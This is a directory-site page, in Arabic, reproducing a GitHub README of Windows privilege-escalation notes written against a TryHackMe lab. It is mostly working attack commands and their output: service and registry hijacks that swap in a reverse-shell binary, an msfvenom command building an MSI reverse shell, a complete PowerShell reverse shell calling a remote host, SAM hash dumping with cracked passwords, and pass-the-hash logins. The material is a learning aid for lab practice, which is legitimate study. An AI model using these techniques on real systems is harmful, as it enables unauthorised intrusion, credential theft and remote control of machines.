Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Windows-Privilege-Escalation-Notes — دليلي العملي لمفاهيم تصعيد الامتيازات في ويندوز. تأكد من الاطلاع على قائمة التشغيل الخاصة بي، الرابط: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk | Kitploit
أدوات/GitHubGitHub/saisathvik1/windows-privilege-escalation-notes
تصعيد الامتيازاتهجمات كلمات المرورالاستغلالجمع المعلوماتما بعد الاستغلالCTFاختبار الاختراقالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
saisathvik1/windows-privilege-escalation-notes

Windows-Privilege-Escalation-Notes

دليلي العملي لمفاهيم تصعيد الامتيازات في ويندوز. تأكد من الاطلاع على قائمة التشغيل الخاصة بي، الرابط: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk

عرض المستودع
59143منذ 4 سنواتتمت المراجعة من قبل Kitploit

تصعيد الامتيازات في Windows

  • الغرفة المفضلة هي https://tryhackme.com/room/windows10privesc، لكن يمكنك استخدام أي شيء من اختيارك.
  • بعض الموارد:
    • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    • https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
    • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
    • https://www.fuzzysecurity.com/tutorials/16.html

أنواع الحسابات في أجهزة Windows:

  • المسؤول (محلي): هذا هو المستخدم الذي يتمتع بأعلى الصلاحيات.
  • القياسي (محلي): يمكن لهؤلاء المستخدمين الوصول إلى الكمبيوتر ولكن يمكنهم فقط تنفيذ مهام محدودة. عادةً لا يمكن لهؤلاء المستخدمين إجراء تغييرات دائمة أو جوهرية على النظام.
  • الضيف: يمنح هذا الحساب إمكانية الوصول إلى النظام ولكنه لا يُعرَّف كمستخدم.
  • القياسي (المجال): تتيح Active Directory للمؤسسات إدارة حسابات المستخدمين. قد يمتلك حساب المجال القياسي صلاحيات مسؤول محلي.
  • المسؤول (المجال): يمكن اعتباره المستخدم الأكثر امتيازًا. يمكنه تعديل وإنشاء وحذف المستخدمين الآخرين عبر مجال المؤسسة.
  • SYSTEM : هذا ليس حسابًا بالمعنى الدقيق، لكن خدمات Windows تستخدم هذا الحساب لأداء مهامها، وحتى هذا الحساب لديه صلاحيات أعلى.

نقطة مهمة جديرة بالملاحظة وهي المجموعات، أي مستخدم ضمن مجموعة المسؤولين يساعدنا على تصعيد الصلاحيات!


جمع المعلومات:

  • من أفضل الموارد: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
  1. whoami /priv - صلاحيات المستخدم الحالي
  2. net users - يسرد جميع المستخدمين
  3. net user <username> - يسرد تفاصيل مستخدم معين
  4. qwinsta - المستخدمون الآخرون المسجلون دخولهم في نفس الوقت
  5. net localgroup - المجموعات المتوفرة في النظام
  6. net localgroup <group-name> - يسرد أعضاء مجموعة معينة
  7. systeminfo - يعطي كل المعلومات حول نظام التشغيل
  8. hostname - اسم المضيف للنظام
  9. findstr /si password *.txt - نبحث عن الملفات التي تحتوي على 'password' وتحديدًا في الملفات النصية
  10. wmic qfe get Caption,Description,HotFixID,InstalledOn - يخبرنا عن التصحيحات الأمنية والمعلومات ذات الصلة
  11. netstat -ano - الاتصالات المرتبطة بالجهاز
  12. schtasks /query /fo LIST /v - للبحث عن أي مهام مجدولة

Windows Exploit Suggester:

  • هذه أداة أسطورية يستخدمها معظم الناس
  • يمكننا حل 60% من الأجهزة الموجودة على الإنترنت باستخدام هذه الأداة
  • الرابط: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • فقط احصل على نسخة من مخرجات أداة systeminfo على جهازك وهذا هو المطلب الوحيد لهذه الأداة
  • نصيحة احترافية: تأكد من تلبية جميع المتطلبات!

البرمجيات الضعيفة:

  • هنا سنحاول العثور على إصدار البرنامج المثبت ومعرفة ما إذا كان عرضة للثغرات أم لا
  • wmic product get name,version,vendor - يعطي اسم المنتج والإصدار والبائع. هذا الأمر بالتحديد يعطي تصورًا واضحًا لما نحتاجه.
  • في بعض الأحيان قد لا يعمل الأمر أعلاه، لذا استخدم wmic service list brief | findstr "Running" ومن أجل الحصول على مزيد من المعلومات حول الخدمة استخدم sc qc <ServiceName>


تصعيد الامتيازات عبر Metasploit:

  • بعد الحصول على جلسة في metasploit، شغّل وحدة باسم post/multi/recon/local_exploit_suggester، تأكد من أن جلستك في الخلفية حتى تعمل هذه الأداة بشكل صحيح، أو يمكنك ببساطة تحميلها من meterpreter.
  • ثم ستقترح بعض الوحدات القابلة للاستغلال، فجرّبها وقد يعمل بعضها (اختياري).


WinPEAS:

  • هذا سكربت تعداد تلقائي مفيد جدًا.
  • للاستخدام الأمثل، اطلع على جميع الخيارات بتشغيل winpeas.exe --help
  • شغّل الخيارات المطلوبة فقط واضبط المخرجات.


استغلال النواة:

  • استخدم هذه الأداة تحديدًا المسماة Windows Exploit Suggester
  • أولاً احصل على معلومات النظام بتشغيل الأمر systeminfo وانسخ ذلك إلى أي ملف وسمِّه بالامتداد .txt
  • الآن شغّل الأداة باستخدام قاعدة البيانات
  • هنا ابحث عن الاستغلالات المتعلقة بالنواة.
  • استمتع بالاختراق!!


استغلال الخدمات:

صلاحيات الخدمات غير الآمنة:

  • هنا سنحاول تحديد الخدمات التي تمتلك صلاحيات غير آمنة ثم يمكننا محاولة استغلالها.

  • هنا يمكننا استخدام الأمر winpeas.exe servicesinfo ويمكننا رؤية الخدمات المفيدة جدًا

  • أحد الأجزاء المثيرة للاهتمام في المخرجات هو كما يلي،```

    daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig

root@kitploit:~
- لكن للحصول على مزيد من المعلومات يمكننا استخدام أداة تسمى **accesschk** وهي من إنتاج مايكروسوفت، قم بتشغيلها على النحو التالي `accesschk.exe /accepteula -uwcqv <current-user> <service>`، الناتج هو،```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

  • لكن الجزء الرئيسي هو service_change_config حيث يمكننا تغيير إعدادات الخدمة.
  • قم بتشغيل sc qc <service> ثم لاحظ Binary_path_name (يمكن أيضًا تسميته binpath)، الذي سنقوم بتغييره (ابتسامة شريرة)
  • الآن أنشئ حمولة من نوع shell وانقلها إلى الجهاز الهدف
  • صيغة تغيير الإعداد: sc config <service> <option>="<value>"
  • الآن sc config daclsvc binpath="<path>" ثم ابدأ الخدمة sc start daclsvc

مسار خدمة غير مقتبس:(USP)

  • بالنسبة للخدمات، يجب أن يكون المسار بين علامتي اقتباس، وإذا لم يكن كذلك فيمكننا استغلال هذه الثغرة والحصول على صلاحيات عالية.``` Vulnerability Insight: The Windows API must assume where to find the referenced application if the path contains spaces and is not enclosed by quotation marks. If, for example, a service uses the unquoted path:

Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe

The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.

C:\Program.exe C:\Program Files\Ignite.exe C:\Program Files\Ignite Data\Vuln.exe C:\Program Files\Ignite Data\Vuln Service\file.exe

root@kitploit:~
- للحصول على مزيد من المعلومات، ما عليك سوى استخدام سكربت **WinPEAS** مع الخيار `servicesinfo`، وهنا يمكننا رؤية معلومات حول ما إذا كان يمكننا استغلال أي **Unquoted Service Path**. لقد قمت بتشغيل الأداة وكان الجزء المثير للاهتمام من المخرجات كما يلي،```
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected  
  • يوضح الإخراج هنا بوضوح أنه No quotes and Space Detected، لذا يمكننا استنتاج أن بإمكاننا استغلال هذه الخدمة المحددة باستخدام USP
  • ولجمع المزيد من المعلومات حول الخدمة استخدم sc qc <service>
  • الآن دعونا نتحقق من صلاحيات هذا الموقع المحدد C:\Program Files\Unquoted Path Service باستخدام accesschk، لذا قم بتشغيل accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service". الإخراج:``` accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service" C:\Program Files\Unquoted Path Service Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators
root@kitploit:~
- لدينا إذن القراءة والكتابة.
- الآن سننشئ الحمولة ونلصقها في `C:\Program Files\Unquoted Path Service`، عبر `copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"`، هنا أستخدم اسمًا مختلفًا له ميزة تتعلق بالترتيب الأبجدي أيضًا.
- الآن ابدأ الخدمة، `sc start unquotedsvc`، نحن مسؤولون!!!

-----------------------
### صلاحيات السجل الضعيفة:
- هنا سنحاول استغلال الخدمات ذات صلاحيات السجل الضعيفة.
- للبحث، نحتاج إلى استخدام `Winpeas` مع خيار `servicesinfo`. يكون الناتج مشابهًا لهذا```
����������͹ Looking if you can modify any service registry
� Check if you can modify the registry of a service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions                                                                                          
    HKLM\system\currentcontrolset\services\regsvc (Interactive [FullControl])

  • الآن ننتقل إلى اسم الخدمة وهو regsvc، لذا دعنا نتعمق في هذه الخدمة، قم بتشغيل sc qc regsvc وسيكون الناتج كما يلي،``` sc qc regsvc [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Insecure Registry Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

root@kitploit:~
- حقيقة رائعة أن المسار محاط بعلامات اقتباس، لذا لا يوجد **Unquoted Service Path**.
- الآن دعنا نشغّل `accesschk.exe` وندخل في العمق، لذا شغّل `accesschk /acceptula -uvwqk <path of registry>`(وهو `HKLM\system\currentcontrolset\services\regsvc`)
- ابحث عن `RW NT AUTHORITY\INTERACTIVE(KEY_ALL_ACCESS)` في المخرجات ونحن الآن جاهزون للاستغلال.
- الآن دعنا نرى الخيارات داخل الريجستري باستخدام `reg query HKLM\system\currentcontrolset\services\regsvc` وقد وجدت خيارًا يسمى `ImagePath` يقبل قيمة ملف تنفيذي، لذا دعنا نستغله. أولاً، أنشئ شيلًا عكسيًا.
- الآن شغّل `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f`, واختر مسار الحمولة وفقًا لمتطلباتك.
- الآن شغّل الخدمة: `net start regsvc` ومرحى! لقد حصلت على الشيل.

-----------------------
### الملفات التنفيذية غير الآمنة للخدمات:
- هنا صلاحيات الملف للخدمة يمكن الوصول إليها من الجميع! نحاول تغيير الملف التنفيذي للخدمة ونكون جاهزين!
- دعنا نشغّل **Winpeas** تحديدًا بوحدة **servicesinfo** ودعنا نرى أي شيء مثير، والمخرجات هي،```
filepermsvc(File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
    File Permissions: Everyone [AllAccess]

  • الجميع لديه صلاحية الوصول إلى ملف الخدمة filepermsvc، لذا سننشئ حمولة reverse_shell ونستبدل بها الملف التنفيذي للخدمة وسنحصل على شل.
  • هذا النوع سهل نسبيًا مقارنة بما سبق.


السجل (Registry)

  • هنا نستخدم السجل لاستخراج المعلومات وسنحاول الاستغلال!
  • نحن فقط نفحص الميزات التي يمكننا إساءة استخدامها

التشغيل التلقائي (Autoruns):

  • التشغيل التلقائي (Autoruns) هي ميزة في ويندوز لتشغيل بعض الخدمات أو التطبيقات عند بدء التشغيل، على سبيل المثال "greenshot"
  • يمكننا فحصها يدويًا عن طريق تشغيل reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - وهذا سيعرض برامج التشغيل التلقائي ومساراتها.
  • المخرجات تكون،``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SecurityHealth REG_EXPAND_SZ %windir%\system32\SecurityHealthSystray.exe My Program REG_SZ "C:\Program Files\Autorun Program\program.exe"
root@kitploit:~
- حصلنا على برنامجين مع المسار، فلنختبرهما.
- الآن سنشغّل **accesscheck** للتحقق من الصلاحيات المتاحة لمسار الملف لهذه البرامج التي تعمل تلقائيًا (autoruns).
- ببساطة شغّل `accesschk.exe \accepteula -wvu "<path>"`، قمت بتشغيله لمسار **My Program** وكان الناتج `FILE_ALL_ACCESS`، لذا يمكننا حرفيًا فعل أي شيء في هذا المجلد. بشكل أساسي يمكننا استبدال الملف التنفيذي الأصلي وإعادة تشغيل النظام وسنحصل على الشل.
- لا، نحتاج إلى الانتظار حتى تسجيل دخول المسؤول وسنحصل على الشل كمستخدم بصلاحيات مميزة!
- الملاحظة هنا أننا نحتاج إلى الانتظار حتى يسجّل المسؤول/المالك الدخول أو كل شيء سيكون على ما يرام!

------------------------------
### AlwaysInstallElevated
- يسمح للمستخدم القياسي بتثبيت **msi** (مثبّت مايكروسوفت) بصلاحيات إدارية.
- هذا أمر رائع وسهل للحصول على صلاحيات أعلى،
- يمكننا التحقق من ذلك بتشغيل،
`reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
` و
`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
`
- شغّل هذين الأمرين ويجب أن تكون قيمة **AlwaysInstallElevated** هي 1 أو 0x1. حتى نتمكن من التأكيد والمتابعة.
- الآن أنشئ شل عكسي بصيغة **msi**، وللاطلاع على مرجع انظر الأمر أدناه،
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.39.50 LPORT=4444 --platform windows -f msi > reverse.msi`
- الآن انقله إلى جهاز ويندوز وشغّل الأمر،
`msiexec /quiet /qn /i reverse.msi`
- مرحى! حصلنا على الشل بصلاحية `nt authority\system`

------------------
-------------------
## كلمات المرور:
- هنا نبحث عن بيانات الاعتماد في السجل، الملفات... إلخ.
- وسنحاول تسجيل الدخول!

----------------------
### البحث عن كلمات المرور في السجل:
- يمكننا البحث في السجل عن كلمات المرور، وأحيانًا يمكننا العثور على كلمات مرور مستخدمين آخرين أو حتى كلمة مرور المالك.
- شغّل `reg query HKLM /f password /t REG_SZ /s` وهذا يعرض كل التفاصيل في السجل التي تحتوي على النص **password**، ابحث وربما تجدها! لكن الجزء المحزن أنني لم أتمكن من الحصول على أي شيء!
- أيضًا شغّل `reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
`، فقد نجد بعض المعلومات.
- يمكننا أيضًا الاستفادة من أداتنا الأسطورية **winPEAS** وتشغيلها مع بعض الخيارات مثل `windowscreds` - تبحث عن بيانات الاعتماد، وأيضًا `filesinfo` - تفحص الملفات والسجل بحثًا عن بيانات مفيدة (وأحيانًا كلمات المرور أيضًا)
- بعد الحصول على كلمة المرور وهنا هي `password123`، لذا الآن لندخل بمساعدة **psexec**(الرابط: https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) وبناء الجملة هو `python3 psexec.py [email protected]` ثم سيطلب كلمة المرور، اذكرها وسنحصل على وصول مثل المسؤول!

-------------------------
### كلمات المرور: Savedcreds
- أولاً شغّل `cmdkey /list`، هنا **cmdkey** هو تطبيق خادم ويندوز يقوم *بإنشاء وقائمة وحذف أسماء المستخدمين وكلمات المرور أو بيانات الاعتماد المخزنة*. بتشغيل هذا يمكننا رؤية جميع بيانات اعتماد المستخدمين المحفوظة!
- الناتج هو،```
Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic 
    User: 02nfpgrklkitqatu
    Local machine persistence
    
    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin
  • يمكننا رؤية المستخدم admin، لذا دعونا نستخدم أداة runas. تتيح للمستخدم تشغيل أدوات وبرامج معينة بصلاحيات مختلفة عن صلاحية تسجيل الدخول الحالية للمستخدم.
  • لنقم بتشغيل runas /savecred /user:admin C:\Temp\reverse.exe، هذا سيمنحنا صلاحيات الأدمن

كلمات المرور: SAM (مدير حسابات الأمان)

  • يتكون SAM من تجزئات NTLH لكلمات مرور ويندوز، لدينا فرصة لاختراقها ولكن هذا قد لا يكون مفيدًا دائمًا لأننا نتعامل مع تجزئات!
  • لكن معرفة الطريقة ستساعد بالتأكيد.
  • وفي 99% من الأحيان لا يمكن الوصول إلى ملف SAM بصلاحيات عادية، لكن هنا في الصندوق أنشأ المؤلف نسخة من ملف SAM في دليل C:\Windows\Repair، حتى نتمكن من اللعب! يوجد في ذلك الدليل ملفان وهما SAM وSYSTEM
  • نحتاج إلى الحصول على كلا الملفين حتى نتمكن من استخدامهما مع أداة تسمى creddump7(https://github.com/CiscoCXSecurity/creddump7). حصلت عليهما بمساعدة أمر download في meterpreter
  • الآن بعد الاستنساخ، قم بتشغيل الأمر التالي python2 pwdump.py /opt/work/SYSTEM /opt/work/SAM وسيعرض تجزئات المستخدمين المتاحين على جهاز ويندوز. المخرجات هي،``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2::: user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a::: admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
root@kitploit:~
- الآن احفظ المحتوى أعلاه في ملف نصي وافك تشفيره بمساعدة **JohnTheRipper**، الصيغة هي `john --format=NT hashes.txt --wordlist=/usr/share/wordlist/rockyou.txt`، وقد تم كسره!```
password123      (admin)     
password321      (user)     
Passw0rd!        (Administrator)  

كلمة المرور: هجوم Pass the hash

  • لنفترض أننا غير قادرين على كسر التجزئة لأنها ليست في قائمة الكلمات، عندها يمكننا استخدام هذا الهجوم Pass the hash، والذي يتيح لنا المصادقة بمساعدة التجزئة!
  • لذا احصل على التجزئة، هنا لنسجل الدخول كـ admin الذي تجزئته هي a9fdfa038c4b75ebc76dc855dd74f0da
  • أولاً قم بالتصدير، export SMBHASH=aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da هنا نحن نستخدم التجزئة مع groupid أيضًا
  • ثم شغّل pth-winexe -U admin% //10.10.213.97 cmd.exe، حصلت على شل كـ admin
  • الأداة pth-winexe متوفرة بالفعل في كالي.
  • إذا علقت تحقق من هذا: https://www.whitelist1.com/2017/10/pass-hash-pth-attack-with-pth-winexe.html


استغلال المهام المجدولة:

  • كما هو الحال في لينكس، توجد مهام مجدولة في ويندوز أيضًا.
  • لعرض جميع المهام المجدولة شغّل schtasks /query /fo LIST /V
  • هنا يبدو CleanUp.ps1 مثيرًا للاهتمام والمسار هو C:\DevTools\CleanUp.ps1
  • لذا دعنا نرى ما يمكننا فعله بهذا الموقع وكذلك بهذا الملف، accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1 ولدينا جميع الصلاحيات للقراءة والكتابة...إلخ
  • العملية في وصف المهمة مختلفة قليلاً لذا بحثت عن powershell-reverseshell، وهو،``` $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
root@kitploit:~
- ثم قمت بنقله وإعادة تسميته إلى `CleanUp.ps1` وحصلت على الاتصال.

--------------------
---------------------
## تطبيقات الواجهة الرسومية غير الآمنة:
- بعد الحصول على اتصال RDP، افتح `Taskmanager` ومن هناك في تبويب `Details` يمكننا رؤية التطبيقات والمستخدم الذي يقوم بتشغيلها.
- هنا قاموا بتكوين `mspaint.exe` ليعمل كمسؤول (admin) عن قصد، لذا سيكون هذا هدفنا.
- بما أننا نعمل مع **Paint** سيكون لدينا خيار لفتح الملفات، لذا سنفتح `file://c:/windows/system32/cmd.exe` وفجأة! نحصل على شل كمستخدم **admin**!
- هنا الوظيفة محدودة بعض الشيء لأننا قد لا نحصل دائمًا على اتصال RDP.

-----------------------
----------------------
## تطبيقات بدء التشغيل:
- تمتلك ويندوز ميزة تسمح لبعض التطبيقات بالعمل عند بدء التشغيل، ويمكننا استغلال هذه الميزة.
- توجد تطبيقات بدء التشغيل في `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp`، وهذا هو المسار الافتراضي.
- لنفحص ما يمكننا فعله عبر **accesschk.exe**، لذا شغّل `accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"`. الناتج هو،```
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW WIN-QBA94KB3IOF\Administrator
  RW WIN-QBA94KB3IOF\admin
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  Everyone
  • يوجد هنا سكربت اسمه CreateShortcut.vbs يعمل بصلاحيات المسؤول، والهدف الرئيسي منه هو إنشاء اختصار للـ reverse-shell الذي قمنا برفعه.
  • انقل الـ payload وشغّل السكربت، الآن علينا الانتظار حتى يسجّل دخول المسؤول ومن ثم سنحصل على الشل.
  • هذا نادر واحتمالية الاستغلال عبره ضئيلة.


انتحال التوكن (Token Impersonation):

  • التوكنات تشبه ملفات تعريف الارتباط (cookies) بالنسبة للحاسوب، الفائدة منها هي أننا لا نحتاج إلى إدخال بيانات الاعتماد في كل مرة من أجل الاتصال بأي شبكة...إلخ.
  • هناك نوعان من التوكنات،
  1. توكن التفويض (Delegate token): يُنشأ لتسجيل الدخول إلى جهاز أو استخدام RDP
  2. توكن الانتحال (Impersonate token): غير تفاعلي، يُستخدم لتوصيل محرك أقراص شبكة أو سكربت تسجيل الدخول إلى المجال.
  • يمكننا رؤية جميع التوكنات عن طريق تشغيل list_tokens -u وذلك داخل جلسة الميتربريتر، وبعد العثور على توكن مناسب ثم تشغيل impersonate_token <name of token>
  • يمكننا أيضًا تشغيل whomai /priv ورؤية صلاحيات المستخدم الحالي، وإذا وجدنا صلاحية مثل SeAssignPrimaryToken...إلخ وهي من النوع الخطير نوعًا ما، هذا خطير جدًا! لمعرفة المزيد عن هذه الصلاحيات وكيفية استغلالها اطلع على هذا المقال: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges

هجمات البطاطس (Potato Attacks):

  • الدليل لهذه الهجمات هو: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
  • والـ payload الذي يمكننا استخدامه هو: https://github.com/ohpe/juicy-potato
  • هنا نحاول الحصول على صلاحيات مثل NT Authority/System [لا يزال قيد التنفيذ.....]
تنزيل الأداة
  • driverquery - يسرد المعلومات المتعلقة بالتعريفات
  • sc query windefend - يبحث عن خدمة برنامج مكافحة الفيروسات